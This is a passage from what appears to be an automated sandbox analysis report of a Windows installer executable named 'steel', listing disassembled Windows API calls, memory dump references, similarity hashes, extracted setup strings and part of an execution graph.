                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3473537107-0
                                                                                            • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                            • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                            • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                            • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                            • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: SystemTime
                                                                                            • String ID:
                                                                                            • API String ID: 2656138-0
                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                            APIs
                                                                                            • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                            • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                            • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                            • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                            • API String ID: 4190037839-2401316094
                                                                                            • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                            • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                              • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                            • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                            • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                            • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                            • LocalFree.KERNEL32(006CAB20,00000000,00401AB4), ref: 00401A1B
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,006CAB20,00000000,00401AB4), ref: 00401A3A
                                                                                            • LocalFree.KERNEL32(006CBB20,?,00000000,00008000,006CAB20,00000000,00401AB4), ref: 00401A79
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 3782394904-0
                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitMessageProcess
                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                            • API String ID: 1220098344-1503883590
                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                            • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: U1hd.@$%k
                                                                                            • API String ID: 2123368496-2691563094
                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID: )q@
                                                                                            • API String ID: 3660427363-2284170586
                                                                                            • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                            • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                            • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                            Strings
                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                            • Setup, xrefs: 00409CAD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                            • API String ID: 2030045667-3271211647
                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2980610205.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2980587725.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980638305.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2980665957.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                            • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:16%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:4.7%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:84
                                                                                            execution_graph 49944 40cd00 49945 40cd12 49944->49945 49946 40cd0d 49944->49946 49948 406f48 CloseHandle 49946->49948 49948->49945 49949 492848 49950 49287c 49949->49950 49951 49287e 49950->49951 49952 492892 49950->49952 50095 446f9c 18 API calls 49951->50095 49955 4928ce 49952->49955 49956 4928a1 49952->49956 49954 492887 Sleep 50048 4928c9 49954->50048 49961 49290a 49955->49961 49962 4928dd 49955->49962 50085 446ff8 49956->50085 49960 4928b0 49964 4928b8 FindWindowA 49960->49964 49967 492919 49961->49967 49968 492960 49961->49968 49963 446ff8 18 API calls 49962->49963 49965 4928ea 49963->49965 50089 447278 49964->50089 49969 4928f2 FindWindowA 49965->49969 50096 446f9c 18 API calls 49967->50096 49973 4929bc 49968->49973 49974 49296f 49968->49974 49971 447278 5 API calls 49969->49971 50035 492905 49971->50035 49972 492925 50097 446f9c 18 API calls 49972->50097 49980 492a18 49973->49980 49981 4929cb 49973->49981 50100 446f9c 18 API calls 49974->50100 49977 492932 50098 446f9c 18 API calls 49977->50098 49978 49297b 50101 446f9c 18 API calls 49978->50101 49991 492a52 49980->49991 49992 492a27 49980->49992 50105 446f9c 18 API calls 49981->50105 49983 49293f 50099 446f9c 18 API calls 49983->50099 49986 492988 50102 446f9c 18 API calls 49986->50102 49987 49294a SendMessageA 49990 447278 5 API calls 49987->49990 49988 4929d7 50106 446f9c 18 API calls 49988->50106 49990->50035 50003 492a61 49991->50003 50004 492aa0 49991->50004 49995 446ff8 18 API calls 49992->49995 49994 492995 50103 446f9c 18 API calls 49994->50103 49998 492a34 49995->49998 49996 4929e4 50107 446f9c 18 API calls 49996->50107 50005 492a3c RegisterClipboardFormatA 49998->50005 50000 4929a0 PostMessageA 50104 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50000->50104 50002 4929f1 50108 446f9c 18 API calls 50002->50108 50110 446f9c 18 API calls 50003->50110 50012 492aaf 50004->50012 50013 492af4 50004->50013 50008 447278 5 API calls 50005->50008 50008->50048 50009 4929fc SendNotifyMessageA 50109 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50009->50109 50010 492a6d 50111 446f9c 18 API calls 50010->50111 50113 446f9c 18 API calls 50012->50113 50020 492b48 50013->50020 50021 492b03 50013->50021 50015 492a7a 50112 446f9c 18 API calls 50015->50112 50018 492abb 50114 446f9c 18 API calls 50018->50114 50019 492a85 SendMessageA 50023 447278 5 API calls 50019->50023 50028 492b57 50020->50028 50034 492baa 50020->50034 50117 446f9c 18 API calls 50021->50117 50023->50035 50025 492ac8 50115 446f9c 18 API calls 50025->50115 50026 492b0f 50118 446f9c 18 API calls 50026->50118 50032 446ff8 18 API calls 50028->50032 50030 492ad3 PostMessageA 50116 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50030->50116 50036 492b64 50032->50036 50033 492b1c 50119 446f9c 18 API calls 50033->50119 50038 492bb9 50034->50038 50039 492c31 50034->50039 50035->50048 50121 42e394 SetErrorMode 50036->50121 50042 446ff8 18 API calls 50038->50042 50050 492c40 50039->50050 50051 492c66 50039->50051 50041 492b27 SendNotifyMessageA 50120 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50041->50120 50045 492bc8 50042->50045 50043 492b71 50046 492b87 GetLastError 50043->50046 50047 492b77 50043->50047 50124 446f9c 18 API calls 50045->50124 50052 447278 5 API calls 50046->50052 50049 447278 5 API calls 50047->50049 50135 403420 50048->50135 50053 492b85 50049->50053 50129 446f9c 18 API calls 50050->50129 50058 492c98 50051->50058 50059 492c75 50051->50059 50052->50053 50057 447278 5 API calls 50053->50057 50056 492c4a FreeLibrary 50130 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50056->50130 50057->50048 50068 492ca7 50058->50068 50074 492cdb 50058->50074 50062 446ff8 18 API calls 50059->50062 50060 492bdb GetProcAddress 50063 492c21 50060->50063 50064 492be7 50060->50064 50065 492c81 50062->50065 50128 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50063->50128 50125 446f9c 18 API calls 50064->50125 50070 492c89 CreateMutexA 50065->50070 50131 48ccc8 18 API calls 50068->50131 50069 492bf3 50126 446f9c 18 API calls 50069->50126 50070->50048 50073 492c00 50077 447278 5 API calls 50073->50077 50074->50048 50133 48ccc8 18 API calls 50074->50133 50076 492cb3 50079 492cc4 OemToCharBuffA 50076->50079 50078 492c11 50077->50078 50127 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50078->50127 50132 48cce0 LocalAlloc 